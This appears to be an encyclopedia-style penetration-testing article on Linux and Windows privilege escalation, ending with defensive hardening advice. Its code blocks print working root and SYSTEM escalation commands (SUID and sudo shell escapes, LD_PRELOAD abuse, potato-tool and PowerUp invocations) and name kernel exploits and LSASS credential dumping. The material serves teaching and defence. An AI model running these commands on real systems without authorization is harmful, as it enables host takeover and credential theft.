Introduction
Privilege escalation is the process of gaining higher-level permissions than those initially obtained during exploitation. In most penetration testing scenarios, the initial foothold on a system is through a low-privileged user account or a service running with restricted permissions. The tester must then escalate privileges to demonstrate the full impact of the compromise -- typically achieving root access on Linux or SYSTEM/Administrator access on Windows.
Privilege escalation is often the step that transforms a minor vulnerability into a critical finding. An initial foothold through a web application might only provide access as the www-data user, but successful privilege escalation to root demonstrates that an attacker could take complete control of the server, access all data, modify configurations, and use the system as a pivot point for further attacks.
Understanding privilege escalation is equally important for defenders. Every escalation path represents a misconfiguration, missing patch, or design flaw that can be remediated. Organizations that systematically eliminate privilege escalation vectors significantly reduce the impact of any initial compromise.
"Getting a shell is only the beginning. The real challenge -- and the real risk to the organization -- is what happens after initial access. Privilege escalation is where a minor breach becomes a catastrophic one." -- TJ Null, Offensive Security
Vertical vs. Horizontal Escalation
Privilege escalation is categorized into two distinct types based on the direction of access elevation:
| Aspect | Vertical Escalation | Horizontal Escalation |
|---|---|---|
| Definition | Gaining higher privileges (user to admin/root) | Accessing another account at the same privilege level |
| Example | Low-privileged user escalates to root/SYSTEM | User A accesses User B's files or session |
| Impact | Complete system control | Unauthorized data access, lateral movement |
| Common Vectors | Kernel exploits, SUID abuse, service misconfigurations | Session hijacking, IDOR, credential reuse |
| Detection Difficulty | Often detectable through privilege use monitoring | Harder to detect -- actions appear authorized |
| MITRE ATT&CK | Tactic TA0004: Privilege Escalation | Tactic TA0008: Lateral Movement (partial overlap) |
In practice, penetration testers frequently combine both types. A horizontal escalation to another user's account might reveal credentials or access rights that enable a subsequent vertical escalation to administrative privileges.
Linux Privilege Escalation
Linux privilege escalation exploits the Unix permission model, file system attributes, and system configuration to elevate from a standard user to root. The rich variety of escalation vectors in Linux environments makes thorough enumeration essential.
SUID/GUID Exploitation
The Set User ID (SUID) and Set Group ID (GUID) permission bits allow a program to execute with the privileges of the file owner or group rather than the executing user. When a binary owned by root has the SUID bit set, it runs with root privileges regardless of who executes it. Misconfigured or vulnerable SUID binaries are one of the most common Linux privilege escalation vectors.
# Find all SUID binaries on the systemfind / -perm -4000 -type f 2>/dev/null# Find all GUID binariesfind / -perm -2000 -type f 2>/dev/null# Common SUID binaries that can be abused for privilege escalation:# (Reference: GTFOBins - https://gtfobins.github.io/)# If 'find' has SUID:find . -exec /bin/sh -p \;# If 'vim' has SUID:vim -c ':!/bin/sh'# If 'python' has SUID:python -c 'import os; os.execl("/bin/sh", "sh", "-p")'# If 'nmap' (old versions) has SUID:nmap --interactive!shSudo Misconfigurations
The sudo utility allows users to execute commands as other users (typically root) based on rules defined in /etc/sudoers. Misconfigurations in sudoers rules frequently provide escalation paths:
# Check what the current user can run with sudosudo -l# Common exploitable sudo configurations:# If user can run vim as root:sudo vim -c ':!/bin/bash'# If user can run less as root:sudo less /etc/shadow!/bin/bash# If user can run awk as root:sudo awk 'BEGIN {system("/bin/bash")}'# If user can run ANY command as another user without password:# (ALL) NOPASSWD: ALLsudo su -# If env_keep includes LD_PRELOAD:# Compile a malicious shared library that spawns a shell# Then: sudo LD_PRELOAD=/tmp/malicious.so some_allowed_commandCron Job Exploitation
Cron jobs are scheduled tasks that run automatically at specified intervals. When a cron job runs as root and references a script or path that a lower-privileged user can modify, it creates an escalation opportunity. The tester modifies the script, and the next time the cron job executes, their code runs with root privileges.
# Examine system cron jobscat /etc/crontabls -la /etc/cron.d/ls -la /etc/cron.daily/# Check for writable scripts referenced by root cron jobs# Look for world-writable scripts, writable directories in PATH,# or wildcard injection opportunities# Monitor cron execution with pspy (no root required)./pspy64Kernel Exploits
Kernel exploits target vulnerabilities in the operating system kernel itself. Because the kernel runs with the highest privileges, a successful kernel exploit immediately grants root access. However, kernel exploits carry significant risk -- a failed attempt may crash the system entirely.
| Exploit | CVE | Affected Kernels | Description |
|---|---|---|---|
| Dirty COW | CVE-2016-5195 | Linux 2.6.22 - 4.8.3 | Race condition in copy-on-write mechanism |
| Dirty Pipe | CVE-2022-0847 | Linux 5.8 - 5.16.11 | Pipe buffer flag manipulation allows file overwrite |
| PwnKit | CVE-2021-4034 | Most Linux distributions (polkit) | Memory corruption in pkexec SUID binary |
| Baron Samedit | CVE-2021-3156 | Sudo 1.8.2 - 1.9.5p1 | Heap overflow in sudo command parsing |
| OverlayFS | CVE-2023-0386 | Linux 5.11 - 6.2 | SUID copy-up vulnerability in OverlayFS |
# Enumerate kernel version and distributionuname -acat /etc/os-releasecat /proc/version# Search for kernel exploits using Linux Exploit Suggester./linux-exploit-suggester.sh# Or use linux-exploit-suggester-2 (Python)python linux-exploit-suggester-2.pyWindows Privilege Escalation
Windows privilege escalation exploits the Windows security model, service architecture, and access token system. The goal is typically to escalate from a standard user to NT AUTHORITY\SYSTEM or a local Administrator account.
Token Impersonation
Windows uses access tokens to represent the security context of a process or thread. Token impersonation attacks exploit the Windows token model to assume the identity of a higher-privileged user. The SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege privileges, commonly held by service accounts (including IIS and SQL Server accounts), enable these attacks.
Notable token impersonation tools and techniques:
- JuicyPotato -- exploits COM servers to impersonate SYSTEM tokens (Windows Server 2008-2016)
- PrintSpoofer -- abuses the print spooler service to capture SYSTEM tokens (Windows 10 / Server 2019)
- RoguePotato -- updated potato attack using OXID resolution (Windows 10 / Server 2019)
- GodPotato -- works across Windows 8 through Windows 11 and Server 2012-2022
# Check current privilegeswhoami /priv# If SeImpersonatePrivilege is enabled:# Use PrintSpoofer for SYSTEM accessPrintSpoofer.exe -i -c cmd# Use JuicyPotato (older Windows versions)JuicyPotato.exe -l 1337 -p c:\windows\system32\cmd.exe -t * -c privilege-escalation# Use GodPotato (modern Windows)GodPotato.exe -cmd "cmd /c whoami"Service Misconfigurations
Windows services run as specified accounts (often SYSTEM). Misconfigurations in service permissions can allow a low-privileged user to modify the service binary path, gaining code execution as the service account:
# Enumerate services with weak permissionsaccesschk.exe /accepteula -uwcqv "Authenticated Users" *# Check a specific service's permissionssc qc "VulnerableService"sc sdshow "VulnerableService"# If the service binary path is writable:# Replace the binary with a malicious one, then restart the service# Using PowerUp.ps1 for automated enumerationpowershell -ep bypass -c "Import-Module .\PowerUp.ps1; Invoke-AllChecks"Unquoted Service Paths
When a Windows service binary path contains spaces and is not enclosed in quotes, Windows attempts to find the executable by trying progressively longer portions of the path. This creates an opportunity to place a malicious executable at one of the intermediate paths.
# Find unquoted service pathswmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """# Example vulnerable path:# C:\Program Files\Vulnerable App\Service Binary\app.exe# Windows will try, in order:# C:\Program.exe# C:\Program Files\Vulnerable.exe# C:\Program Files\Vulnerable App\Service.exe# C:\Program Files\Vulnerable App\Service Binary\app.exe# If the user can write to C:\Program Files\Vulnerable App\:# Place a malicious "Service.exe" thereCommon Misconfigurations
Many privilege escalation vectors stem from configuration errors rather than software vulnerabilities. These are often easier to remediate than software bugs and represent low-hanging fruit for both attackers and defenders:
| Misconfiguration | Platform | Impact | Remediation |
|---|---|---|---|
| World-writable scripts in PATH | Linux | Code execution as script owner | Restrict write permissions, audit PATH |
| Passwords in configuration files | Both | Credential theft, lateral movement | Use secrets management, rotate credentials |
| Weak file permissions on /etc/shadow | Linux | Password hash extraction | Ensure 640 permissions, root:shadow ownership |
| Stored credentials in registry | Windows | AutoLogon, VNC, and other passwords | Remove stored credentials, use credential manager |
| Writable service binaries | Windows | Code execution as SYSTEM | Restrict ACLs on service directories |
| Docker socket exposed | Linux | Container escape to root | Restrict docker group membership |
| AlwaysInstallElevated | Windows | MSI installation as SYSTEM | Disable the GPO setting |
Enumeration Tools
Automated enumeration tools systematically check for common privilege escalation vectors, saving time and ensuring thorough coverage during assessments:
- LinPEAS -- comprehensive Linux privilege escalation enumeration script that checks for SUID binaries, capabilities, cron jobs, writable paths, kernel version, and hundreds of other vectors
- WinPEAS -- Windows equivalent of LinPEAS, checking for service misconfigurations, registry settings, scheduled tasks, token privileges, and more
- Linux Exploit Suggester -- analyzes kernel version and suggests applicable kernel exploits
- PowerUp (PowerSploit) -- PowerShell script for Windows privilege escalation enumeration
- BeRoot -- cross-platform tool checking for common misconfigurations
- Seatbelt -- C# tool performing security-oriented host reconnaissance on Windows
"Automated tools are a starting point, not a substitute for manual analysis. The most impactful privilege escalation findings often come from understanding the specific environment and chaining multiple low-severity issues together." -- Ippsec, security educator and content creator
Credential Harvesting
Credential harvesting is closely related to privilege escalation because discovering stored or cached credentials often provides a direct path to higher privileges. Common locations where credentials may be found:
- Configuration files -- database connection strings, API keys, and service account passwords in application configs
- Shell history -- commands containing passwords in
.bash_history,.zsh_history, or PowerShell history files - Memory -- tools like
mimikatzcan extract plaintext passwords, NTLM hashes, and Kerberos tickets from Windows LSASS process memory - Cached credentials -- Windows caches domain credentials locally; Linux may store credentials in keyrings
- SSH keys -- private keys in
~/.ssh/directories may provide access to other systems - Browser stored passwords -- saved passwords in browser profiles
Defensive Hardening
Preventing privilege escalation requires a defense-in-depth approach that addresses misconfigurations, reduces the attack surface, and detects escalation attempts:
- Principle of least privilege -- assign minimum necessary permissions to users, services, and applications
- Regular patching -- kernel and OS patches eliminate known escalation vulnerabilities
- SUID/GUID auditing -- regularly inventory SUID/GUID binaries and remove unnecessary ones
- Sudo hardening -- restrict sudoers entries to specific commands, avoid NOPASSWD, disable shell escapes
- Service account hardening -- use Group Managed Service Accounts (gMSA) on Windows, restrict service permissions
- Credential hygiene -- never store plaintext passwords in files, use secrets management solutions
- Monitoring and alerting -- monitor for suspicious privilege changes, new SUID files, unusual process execution, and credential access patterns
- AppArmor/SELinux -- mandatory access control frameworks that limit what processes can do even with elevated privileges
For the next phase of penetration testing, see Maintaining Access. For background on the previous phase, see Exploitation.
References
- Weidman, G. (2014). Penetration Testing: A Hands-On Introduction to Hacking. No Starch Press.
- Hak5. (2023). "Linux Privilege Escalation." HackTricks. hacktricks.boitatech.com.br.
- g0tmi1k. (2011). "Basic Linux Privilege Escalation." blog.g0tmi1k.com.
- Fuzzysecurity. (2016). "Windows Privilege Escalation Fundamentals." fuzzysecurity.com.
- Delpy, B. (2024). Mimikatz Documentation. github.com/gentilkiwi/mimikatz.
- MITRE ATT&CK. (2024). "Privilege Escalation." Tactic TA0004. The MITRE Corporation.
- NIST SP 800-123. (2008). Guide to General Server Security. National Institute of Standards and Technology.
- CIS. (2024). CIS Benchmarks for Linux and Windows. Center for Internet Security.
- GTFOBins. (2024). "GTFOBins: Unix Binaries for Privilege Escalation." gtfobins.github.io.
- LOLBAS Project. (2024). "Living Off The Land Binaries, Scripts and Libraries." lolbas-project.github.io.